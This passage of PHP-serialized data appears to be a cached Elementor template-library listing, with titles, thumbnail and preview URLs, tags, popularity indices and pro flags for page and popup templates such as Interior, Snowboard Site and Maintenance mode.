mode\"]\";s:10:\"menu_order\";i:85;s:16:\"popularity_index\";i:212;s:11:\"trend_index\";i:207;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:575;a:14:{s:2:\"id\";i:754;s:5:\"title\";s:25:\"Services &#8211; Interior\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/01/Interior-Services.png\";s:12:\"tmpl_created\";i:1485269691;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/services-interior/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:86;s:16:\"popularity_index\";i:234;s:11:\"trend_index\";i:279;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:576;a:14:{s:2:\"id\";i:752;s:5:\"title\";s:24:\"Contact &#8211; Interior\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2017/01/interior-contact.png\";s:12:\"tmpl_created\";i:1485269737;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/contact-interior/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:87;s:16:\"popularity_index\";i:304;s:11:\"trend_index\";i:376;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:577;a:14:{s:2:\"id\";i:753;s:5:\"title\";s:22:\"About &#8211; Interior\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/01/Interior-About.png\";s:12:\"tmpl_created\";i:1485269710;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/about-interior/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:88;s:16:\"popularity_index\";i:287;s:11:\"trend_index\";i:301;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:578;a:14:{s:2:\"id\";i:751;s:5:\"title\";s:25:\"Homepage &#8211; Interior\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/01/interior-home.png\";s:12:\"tmpl_created\";i:1485269743;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/homepage-interior/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:89;s:16:\"popularity_index\";i:244;s:11:\"trend_index\";i:226;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:579;a:14:{s:2:\"id\";i:10147;s:5:\"title\";s:34:\"Hello Bar | Sale | Promotion | Pop\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/01/donut_small.png\";s:12:\"tmpl_created\";i:1548055522;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/popups/hello-bar-sale-promotion/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:89;s:16:\"popularity_index\";i:690;s:11:\"trend_index\";i:704;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:580;a:14:{s:2:\"id\";i:2402;s:5:\"title\";s:32:\"Homepage &#8211; Interior Design\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2017/09/Interior.png\";s:12:\"tmpl_created\";i:1506441447;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/homepage-interior-design/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:193:\"[\"Architecture\",\"building\",\"business\",\"Creative\",\"exterior design\",\"furniture design\",\"Gallery\",\"garden design\",\"house\",\"interior design\",\"landscape design\",\"multipurpose\",\"portfolio\",\"studio\"]\";s:10:\"menu_order\";i:90;s:16:\"popularity_index\";i:103;s:11:\"trend_index\";i:178;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:581;a:14:{s:2:\"id\";i:9923;s:5:\"title\";s:23:\"Slide In | Announcement\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2019/01/slide-in_ann_italian_small.png\";s:12:\"tmpl_created\";i:1547841537;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/popups/slide-in-announcement/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:90;s:16:\"popularity_index\";i:622;s:11:\"trend_index\";i:675;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:582;a:14:{s:2:\"id\";i:10117;s:5:\"title\";s:23:\"Slide In | Announcement\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/01/white_small.png\";s:12:\"tmpl_created\";i:1548066998;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/popups/slide-in-announcement-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:91;s:16:\"popularity_index\";i:652;s:11:\"trend_index\";i:571;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:583;a:14:{s:2:\"id\";i:3626;s:5:\"title\";s:30:\"Snowboard Site &#8211; Contact\";s:9:\"thumbnail\";s:62:\"https://library.elementor.com/wp-content/uploads/2017/12/3.png\";s:12:\"tmpl_created\";i:1513513193;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/snowboard-site-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:91;s:16:\"popularity_index\";i:257;s:11:\"trend_index\";i:405;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:584;a:14:{s:2:\"id\";i:11966;s:5:\"title\";s:18:\"Maintenance mode 4\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2019/10/mm4.png\";s:12:\"tmpl_created\";i:1572154274;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/maintenance-mode-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:20:\"[\"Maintenance mode\"]\";s:10:\"menu_order\";i:92;s:16:\"popularity_index\";i:510;s:11:\"trend_index\";i:513;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:585;a:14:{s:2:\"id\";i:9826;s:5:\"title\";s:33:\"Slide In | Announcement | webinar\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/01/web_small-2.png\";s:12:\"tmpl_created\";i:1547835513;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/popups/slide-in-announcement-webinar/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:92;s:16:\"popularity_index\";i:662;s:11:\"trend_index\";i:668;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:586;a:14:{s:2:\"id\";i:10478;s:5:\"title\";s:18:\"Slide In | Contact\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2019/01/slide_wow_small.png\";s:12:\"tmpl_created\";i:1548056829;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/popups/slide-in-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:93;s:16:\"popularity_index\";i:549;s:11:\"trend_index\";i:525;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:587;a:14:{s:2:\"id\";i:3632;s:5:\"title\";s:31:\"Snowboard Site &#8211; Services\";s:9:\"thumbnail\";s:62:\"https://library.elementor.com/wp-content/uploads/2017/12/2.png\";s:12:\"tmpl_created\";i:1513513171;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/snowboard-site-services/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:93;s:16:\"popularity_index\";i:197;s:11:\"trend_index\";i:305;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:588;a:14:{s:2:\"id\";i:3619;s:5:\"title\";s:31:\"Snowboard Site &#8211; Homepage\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2017/12/home.png\";s:12:\"tmpl_created\";i:1513513137;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/snowboard-site-homepage/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:94;s:16:\"popularity_index\";i:216;s:11:\"trend_index\";i:183;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:589;a:14:{s:2:\"id\";i:9425;s:5:\"title\";s:38:\"Black Friday &#8211;  80&#8217;s style\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/11/unnamed-file.png\";s:12:\"tmpl_created\";i:1542901234;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/black-friday-80s-style/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:95;s:16:\"popularity_index\";i:331;s:11:\"trend_index\";i:495;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:590;a:14:{s:2:\"id\";i:10685;s:5:\"title\";s:32:\"Hello Bar | Register | Subscribe\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/01/env_small.png\";s:12:\"tmpl_created\";i:1547974729;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/popups/hello-bar-register-subscribe-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:96;s:16:\"popularity_index\";i:634;s:11:\"trend_index\";i:672;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:591;a:14:{s:2:\"id\";i:11973;s:5:\"title\";s:18:\"Maintenance mode 5\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2019/10/mm5.png\";s:12:\"tmpl_created\";i:1572154523;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/maintenance-mode-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:20:\"[\"Maintenance mode\"]\";s:10:\"menu_order\";i:96;s:16:\"popularity_index\";i:460;s:11:\"trend_index\";i:298;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:592;a:14:{s:2:\"id\";i:9985;s:5:\"title\";s:20:\"Slide In | Promotion\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2019/01/slidein_promotion_av_small.png\";s:12:\"tmpl_created\";i:1547844661;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/popups/slide-in-promotion-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:98;s:16:\"popularity_index\";i:677;s:11:\"trend_index\";i:0;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:593;a:14:{s:2:\"id\";i:9559;s:5:\"title\";s:16:\"Slide In | Login\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2019/01/slidein_login_01_small.png\";s:12:\"tmpl_created\";i:1546946547;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/popups/slide-in-login-01/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:105;s:16:\"popularity_index\";i:550;s:11:\"trend_index\";i:627;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:594;a:14:{s:2:\"id\";i:11981;s:5:\"title\";s:18:\"Maintenance mode 6\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2019/10/mm6.png\";s:12:\"tmpl_created\";i:1572155125;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/maintenance-mode-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:20:\"[\"Maintenance mode\"]\";s:10:\"menu_order\";i:107;s:16:\"popularity_index\";i:449;s:11:\"trend_index\";i:318;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:595;a:14:{s:2:\"id\";i:9752;s:5:\"title\";s:27:\"Slide In | Sale | Promotion\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/01/rush_small.png\";s:12:\"tmpl_created\";i:1547823982;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/popups/slide-in-sale-promotion/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:107;s:16:\"popularity_index\";i:660;s:11:\"trend_index\";i:644;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:596;a:14:{s:2:\"id\";i:147;s:5:\"title\";s:20:\"Homepage &#8211; App\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0004.png\";s:12:\"tmpl_created\";i:1470829868;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/homepage-app/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:18:\"[\"App\",\"Homepage\"]\";s:10:\"menu_order\";i:111;s:16:\"popularity_index\";i:4;s:11:\"trend_index\";i:52;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:597;a:14:{s:2:\"id\";i:10169;s:5:\"title\";s:37:\"Slide In | Register | Subscribe | App\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2019/01/slideinapp_small.png\";s:12:\"tmpl_created\";i:1547852334;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/popups/slide-in-register-subscribe-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:112;s:16:\"popularity_index\";i:445;s:11:\"trend_index\";i:683;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:598;a:14:{s:2:\"id\";i:777;s:5:\"title\";s:28:\"Homepage &#8211; Coffee Shop\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/01/rest-home.jpg\";s:12:\"tmpl_created\";i:1485273092;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/homepage-coffee-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:41:\"[\"Coffee\",\"Homepage\",\"Restaurant\",\"Shop\"]\";s:10:\"menu_order\";i:112;s:16:\"popularity_index\";i:154;s:11:\"trend_index\";i:244;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:599;a:14:{s:2:\"id\";i:2404;s:5:\"title\";s:24:\"Homepage &#8211; Product\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2017/09/product.png\";s:12:\"tmpl_created\";i:1506441452;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/homepage-product/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:103:\"[\"business\",\"colorful\",\"ecommerce\",\"flat\",\"mobile\",\"modern\",\"responsive\",\"retina\",\"Shop\",\"woocommerce\"]\";s:10:\"menu_order\";i:113;s:16:\"popularity_index\";i:146;s:11:\"trend_index\";i:261;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:600;a:14:{s:2:\"id\";i:492;s:5:\"title\";s:25:\"Homepage &#8211; Law firm\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/10/0024.png\";s:12:\"tmpl_created\";i:1477388365;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/homepage-law-firm/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:25:\"[\"Firm\",\"Homepage\",\"Law\"]\";s:10:\"menu_order\";i:114;s:16:\"popularity_index\";i:12;s:11:\"trend_index\";i:186;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:601;a:14:{s:2:\"id\";i:3451;s:5:\"title\";s:39:\"Homepage &#8211; Goodness meal services\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2017/11/goodness-featured-image.png\";s:12:\"tmpl_created\";i:1512054116;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/homepage-goodness-meal-services/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:115;s:16:\"popularity_index\";i:228;s:11:\"trend_index\";i:370;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:602;a:14:{s:2:\"id\";i:9680;s:5:\"title\";s:23:\"Slide In | Content Lock\";s:9:\"thumbnail\";s:91:\"https://library.elementor.com/wp-content/uploads/2019/01/Slide-in_Content-lock_small_01.png\";s:12:\"tmpl_created\";i:1547010967;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/popups/slide-in-content-lock-01/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:115;s:16:\"popularity_index\";i:654;s:11:\"trend_index\";i:660;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:603;a:14:{s:2:\"id\";i:2152;s:5:\"title\";s:26:\"Homepage &#8211; Cake Shop\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/07/cake-home.png\";s:12:\"tmpl_created\";i:1499774132;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/homepage-cake-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Cake\",\"Homepage\",\"Restaurant\",\"Shop\"]\";s:10:\"menu_order\";i:116;s:16:\"popularity_index\";i:343;s:11:\"trend_index\";i:502;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:604;a:14:{s:2:\"id\";i:1068;s:5:\"title\";s:27:\"Homepage &#8211; Copywriter\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2017/03/copywriter.png\";s:12:\"tmpl_created\";i:1488805928;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/homepage-copywriter/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:25:\"[\"Copywriter\",\"Homepage\"]\";s:10:\"menu_order\";i:117;s:16:\"popularity_index\";i:217;s:11:\"trend_index\";i:357;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:605;a:14:{s:2:\"id\";i:9783;s:5:\"title\";s:31:\"Slide In | Register | Subscribe\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2019/01/slidein_yellow_small.png\";s:12:\"tmpl_created\";i:1547831059;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/popups/slide-in-register-subscribe/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:117;s:16:\"popularity_index\";i:492;s:11:\"trend_index\";i:579;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:606;a:14:{s:2:\"id\";i:2813;s:5:\"title\";s:32:\"Homepage &#8211; Creative Agency\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2017/11/Creative-Agency-–-Home-Page.png\";s:12:\"tmpl_created\";i:1509615049;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/homepage-creative-agency/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Agency\",\"Creative\",\"Homepage\"]\";s:10:\"menu_order\";i:118;s:16:\"popularity_index\";i:117;s:11:\"trend_index\";i:181;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:607;a:14:{s:2:\"id\";i:728;s:5:\"title\";s:33:\"Homepage &#8211; Delivery Company\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2017/01/delivery-company-home-page.jpg\";s:12:\"tmpl_created\";i:1485269993;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/homepage-delivery-company/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:23:\"[\"Delivery\",\"Homepage\"]\";s:10:\"menu_order\";i:119;s:16:\"popularity_index\";i:283;s:11:\"trend_index\";i:474;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:608;a:14:{s:2:\"id\";i:2403;s:5:\"title\";s:29:\"Homepage &#8211; Luxury Hotel\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2017/09/Hotel.png\";s:12:\"tmpl_created\";i:1506441428;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/homepage-luxury-hotel/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:120;s:16:\"popularity_index\";i:270;s:11:\"trend_index\";i:433;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:609;a:14:{s:2:\"id\";i:1903;s:5:\"title\";s:20:\"One Page &#8211; Spa\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2017/06/spa.png\";s:12:\"tmpl_created\";i:1496822325;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/one-page-spa/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:132:\"[\"beauty\",\"care\",\"girly\",\"hair\",\"Health\",\"hospitality\",\"massage\",\"medical\",\"parlor\",\"physiotherapy\",\"salon\",\"spa\",\"wellness\",\"yoga\"]\";s:10:\"menu_order\";i:121;s:16:\"popularity_index\";i:185;s:11:\"trend_index\";i:161;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:610;a:14:{s:2:\"id\";i:2123;s:5:\"title\";s:33:\"One Page &#8211; Architect Office\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/06/architect.png\";s:12:\"tmpl_created\";i:1499772989;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/one-page-architect-office/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:122;s:16:\"popularity_index\";i:11;s:11:\"trend_index\";i:59;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:611;a:14:{s:2:\"id\";i:1888;s:5:\"title\";s:32:\"One Page &#8211; Creative Meetup\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2017/06/creative-meetup.png\";s:12:\"tmpl_created\";i:1496822319;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/one-page-creative-meetup/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:123;s:16:\"popularity_index\";i:280;s:11:\"trend_index\";i:496;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:612;a:14:{s:2:\"id\";i:1891;s:5:\"title\";s:35:\"One Page &#8211; Textile Convention\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/06/textile-meetup.png\";s:12:\"tmpl_created\";i:1496822323;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/one-page-textile-convention/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:124;s:16:\"popularity_index\";i:410;s:11:\"trend_index\";i:547;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:613;a:14:{s:2:\"id\";i:1880;s:5:\"title\";s:24:\"One Page &#8211; Wedding\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2017/06/wedding.png\";s:12:\"tmpl_created\";i:1496822317;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/one-page-wedding/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:82:\"[\"bride\",\"ceremony\",\"cute\",\"event\",\"fancy\",\"girly\",\"groom\",\"guestbook\",\"marriage\"]\";s:10:\"menu_order\";i:125;s:16:\"popularity_index\";i:462;s:11:\"trend_index\";i:690;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:614;a:14:{s:2:\"id\";i:1885;s:5:\"title\";s:29:\"One Page &#8211; Yacht Rental\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2017/06/yacht-home.png\";s:12:\"tmpl_created\";i:1496822321;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/one-page-yacht-rental/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:126;s:16:\"popularity_index\";i:207;s:11:\"trend_index\";i:412;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:615;a:14:{s:2:\"id\";i:2723;s:5:\"title\";s:34:\"Portfolio &#8211; Graphic 